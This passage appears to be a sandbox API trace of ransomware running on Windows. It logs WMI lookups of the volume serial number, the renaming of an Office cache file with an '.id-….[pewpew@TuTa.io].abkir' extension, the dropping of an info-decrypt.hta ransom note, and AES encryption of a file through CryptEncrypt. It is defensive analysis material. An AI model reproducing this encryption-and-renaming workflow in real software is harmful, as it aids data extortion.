riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0159.823] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5b924) returned 0x0 [0159.823] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b924, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0159.823] WbemLocator:IUnknown:Release (This=0xb5b924) returned 0x3 [0159.823] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0159.823] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0159.823] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5b9ac) returned 0x0 [0159.823] WbemLocator:IRpcOptions:Query (in: This=0xb5b9ac, pPrx=0xb5b9c4, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0159.823] WbemLocator:IUnknown:Release (This=0xb5b9ac) returned 0x3 [0159.823] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x2 [0159.823] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0159.823] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0159.823] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x60279ac) returned 0x0 [0159.823] WbemLocator:IUnknown:AddRef (This=0x60279ac) returned 0x4 [0159.823] WbemLocator:IUnknown:Release (This=0x60279ac) returned 0x3 [0159.823] WbemLocator:IUnknown:Release (This=0x60279ac) returned 0x2 [0159.823] SysStringLen (param_1=0x0) returned 0x0 [0159.823] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026100, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0159.823] WbemDefPath:IWbemPath:GetText (in: This=0x6026100, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0159.824] WbemDefPath:IWbemPath:GetText (in: This=0x6026100, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0159.824] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0159.824] WbemLocator:IUnknown:AddRef (This=0xb5b9c4) returned 0x3 [0159.824] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5b9c4) returned 0x0 [0159.824] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x3 [0159.824] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x2 [0159.824] WbemDefPath:IWbemPath:GetText (in: This=0x6026100, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0159.824] WbemDefPath:IWbemPath:GetText (in: This=0x6026100, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0159.824] IWbemServices:GetObject (in: This=0x60279ac, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6028b10, ppCallResult=0x0) returned 0x0 [0160.025] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026170, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0160.025] WbemDefPath:IWbemPath:GetText (in: This=0x6026170, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0160.025] WbemDefPath:IWbemPath:GetText (in: This=0x6026170, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0160.026] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36a9c04*=0, plFlavor=0x36a9c08*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36a9c04*=8, plFlavor=0x36a9c08*=0) returned 0x0 [0160.026] SysStringByteLen (bstr="9C354B42") returned 0x10 [0160.026] SysStringByteLen (bstr="9C354B42") returned 0x10 [0160.026] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36a9c04*=8, plFlavor=0x36a9c08*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36a9c04*=8, plFlavor=0x36a9c08*=0) returned 0x0 [0160.026] SysStringByteLen (bstr="9C354B42") returned 0x10 [0160.026] SysStringByteLen (bstr="9C354B42") returned 0x10 [0160.026] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0160.026] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x73 [0160.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0160.026] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1bf3b5c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0160.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0160.027] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0160.027] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0160.027] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0160.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0160.027] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b18b740, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1b18b740, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1b18b740, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0160.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0160.028] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0160.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0160.028] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x36aa2c8 | out: lpFileInformation=0x36aa2c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0160.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0160.028] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0160.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0160.028] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0160.028] GetFileType (hFile=0x45c) returned 0x1 [0160.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0160.028] GetFileType (hFile=0x45c) returned 0x1 [0160.028] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x5aa [0160.029] ReadFile (in: hFile=0x45c, lpBuffer=0x3739a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x3739a78*, lpNumberOfBytesRead=0x6c0f4ec*=0x5aa, lpOverlapped=0x0) returned 1 [0160.033] CloseHandle (hObject=0x45c) returned 1 [0160.033] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbe10a8) returned 1 [0160.034] CryptGenRandom (in: hProv=0xbe10a8, dwLen=0x10, pbBuffer=0x373adcc | out: pbBuffer=0x373adcc) returned 1 [0161.788] CryptImportKey (in: hProv=0xbe10a8, pbData=0x37b0650, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7fc10) returned 1 [0161.788] CryptContextAddRef (hProv=0xbe10a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0161.788] CryptContextAddRef (hProv=0xbe10a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0161.788] CryptDuplicateKey (in: hKey=0xb7fc10, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f750) returned 1 [0161.788] CryptContextAddRef (hProv=0xbe10a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0161.788] CryptSetKeyParam (hKey=0xb7f750, dwParam=0x4, pbData=0x37b0730*=0x1, dwFlags=0x0) returned 1 [0161.788] CryptSetKeyParam (hKey=0xb7f750, dwParam=0x1, pbData=0x37b06fc, dwFlags=0x0) returned 1 [0161.788] CryptEncrypt (in: hKey=0xb7f750, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37b0740*, pdwDataLen=0x6c0f4b8*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x37b0740*, pdwDataLen=0x6c0f4b8*=0x5b0) returned 1 [0161.788] CryptEncrypt (in: hKey=0xb7f750, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37b0d14*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x37b0d14*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0161.790] CryptDestroyKey (hKey=0xb7fc10) returned 1 [0161.790] CryptReleaseContext (hProv=0xbe10a8, dwFlags=0x0) returned 1 [0161.790] CryptReleaseContext (hProv=0xbe10a8, dwFlags=0x0) returned 1 [0161.790] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0161.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0161.790] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0161.791] GetFileType (hFile=0x2f0) returned 0x1 [0161.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0161.791] GetFileType (hFile=0x2f0) returned 0x1 [0161.791] WriteFile (in: hFile=0x2f0, lpBuffer=0x37b1358*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x37b1358*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0161.792] CloseHandle (hObject=0x2f0) returned 1 [0161.793] CoTaskMemAlloc (cb=0x20c) returned 0x66cc750 [0161.793] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cc750 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0161.793] CoTaskMemFree (pv=0x66cc750) [0161.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0161.793] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0161.793] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0161.793] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0161.793] IUnknown:Release (This=0xb51e34) returned 0x1 [0161.794] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x60275d0) returned 0x0 [0161.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x60275d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0161.794] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60275d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6030780) returned 0x0 [0161.795] WbemDefPath:IUnknown:Release (This=0x60275d0) returned 0x0 [0161.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6030780) returned 0x0 [0161.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0161.795] WbemDefPath:IUnknown:AddRef (This=0x6030780) returned 0x3 [0161.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0161.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0161.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbe2470) returned 0x0 [0161.795] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2470, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.795] WbemDefPath:IUnknown:Release (This=0xbe2470) returned 0x3 [0161.795] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0161.795] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0161.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0161.795] WbemDefPath:IUnknown:Release (This=0x6030780) returned 0x2 [0161.795] WbemDefPath:IUnknown:Release (This=0x6030780) returned 0x1 [0161.795] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0161.795] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0161.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030780, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6030780) returned 0x0 [0161.795] WbemDefPath:IUnknown:AddRef (This=0x6030780) returned 0x3 [0161.795] WbemDefPath:IUnknown:Release (This=0x6030780) returned 0x2 [0161.795] WbemDefPath:IWbemPath:SetText (This=0x6030780, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.795] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030780, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0161.795] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0161.795] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.796] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030780, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0161.796] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030780, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0161.796] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030780, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0161.796] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030780, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0161.796] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030780, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0161.796] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0161.796] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0161.796] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.796] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0161.796] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0161.796] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0161.796] IUnknown:Release (This=0xb51e34) returned 0x1 [0161.797] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x60275c0) returned 0x0 [0161.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: 